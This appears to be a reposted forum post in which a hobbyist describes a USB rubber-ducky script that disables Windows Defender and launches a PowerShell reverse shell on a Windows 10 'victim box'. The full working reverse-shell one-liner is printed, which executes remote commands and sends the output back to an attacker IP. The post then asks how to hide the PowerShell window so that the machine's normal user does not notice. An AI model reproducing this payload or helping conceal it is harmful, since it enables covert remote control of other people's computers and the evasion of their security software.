Hi, recently I learned about reverse shells and I manage to successfully got both Windows and Linux reverse shells to work which got me very excited. I then went on to make my own powershell rubber ducky script that disables Windows Defender and runs the powershell reverse shell one-liner:
$client = New-Object System.Net.Sockets.TCPClient("[ip address]",port);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
This works great and all but it seems like the powershell window needs to be open for the connection to stay open. Currently, the best I can do right now it minimize the powershell window but its still pretty obvious even to the normal user.
I thought of 2 possibilities:
1) Maybe there is a way to run a powershell command in the background.
2) Maybe there is a way to form another type of hidden reverse shell (?) after getting a reverse shell in the first place with the one-liner above.
I could not find any solutions for my scenario so if you guys have any ideas please state below, thanks.
Attacker machine: Manjaro Linux
Victim box: Windows 10 home
[link] [comments]
from hacking: security in practice https://ift.tt/YnsXi3w
Comments
Post a Comment